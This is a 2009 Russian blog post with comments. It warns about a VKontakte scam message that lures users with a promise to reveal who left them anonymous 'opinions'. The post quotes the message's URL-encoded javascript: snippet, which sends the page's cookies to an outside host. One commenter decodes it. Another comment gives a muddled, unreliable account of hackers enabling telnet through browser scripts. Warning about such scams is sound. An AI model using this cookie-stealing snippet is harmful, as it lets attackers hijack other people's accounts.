Скрипт для прочтения мнений Вконтакте
Многие из нас зарегистрированы в мегагигантской социальной сети под названием “Вконтакте”. Сеть большая – много всего интересного. Сегодня я хотел рассмотреть одно сообщение, которое получил не так давно. Самое интересное – что это не просто сообщение, а мнение. Т.е. анонимный отзыв о пользователе. Если оно попало к вам, вы не можете узнать от кого оно. Вот так же случилось и со мной. Мнения я получал и раньше, но в этот раз оно не подходило под обычные стандарты. Итак, сам текст:
Привет зай :-* Отлично выглядишь на фотке))
Кстать, хочешь узнать, кто тебе мнения оставлял (включая меня), а также заходил на твою страницу? В общем, копируй этот код:javascript:%64%6F%63%75%6D%65%6E%74.%77%72%69%74%65(‘<script>img = new Image(); img.src = «%68%74%74%70:%2F%2F%6F%70%69%6E%69%6F%6E.%74%75%32.%72%75/%73.%70%68%70?»+%64%6F%63%75%6D%65%6E%74.%63%6F%6F%6B%69%65;</script>’)
в адресную строку браузера НА ЭТОЙ СТРАНИЦЕ и перейди по нему)) Только особо не распространяйся, а то прикроют эту халяву
![]()
Довольно интересно. Но в деда Мороза в наше время лучше не верить. Что на самом деле делает этот скрипт – я сказать не могу. Возможно, ворует (точнее вы сами отдаете) пароли. Возможно, что-то рассылает.
Проверять я не стал. Но статья, я думаю, всё равно пригодится. Может позже, кто проверит и расскажет, что будет, если его ввести.
На эту статью оставлено 4 комментариев
21 Июл 2009
Привет горе шифраторам, угу.
А попросили тебя всего навсего ввести в адресную строку следующее:
javascript:
document.write(’
img = new Image();
img.src = “http://opinion.tu2.ru/s.php?”+document.cookie;
’)
что делает этот самый s.php и зачем ему указывать JS переменные куки.. могу лишь догадываться
22 Июл 2009
Может этот скрипт cookie как раз и ворует? Вы знаете что в них много всего интересного бывает.
03 Окт 2009
В куках, насколько я знаю, могут содержаться данные об аккаунтах и паролях. Не нужно долго гадать, зачем они могли понадобится лохотронщику.
07 Окт 2009
Ворованные куки можно использовать двумя способами:
1. Подключить их к своему браузеру и сидеть в сети под чужим именем.
2. Подключить написав спец. программу и тоже использовать в своих целях.
Вообще со скриптами в веб надо быть очень осторожными, через скрипт хакер может используя уязвимость в оси включить службу telnet на вашем компике и взять MAC адрес вашей машины. А также поменять в политиках безопасности разрешение на ввод пароля более чем 3 раза.
Потом даже если у вас IP адрес динамический, а не статический, хакер может отправить arp запрос на поиск MAC адреса в сети и вернуть текущий IP установленный у вас на данный момент.
Используя данные хакер подключить через утилиту telnet к вашей машине, ну а дальше через метод грубой силы или по словарю подбирать ваш пароль администратора к машине, используя спуффер или прокси чтобы не выкупно было.
Лучше пользуйтесь Mozilla Firefox, последней версией, с этим браузером безопаснее бродить по просторам интернета и поставьте себе помимо антивируса, спец ПО Adware. Оно будет блокировать атаки скриптами.
Ваш отзыв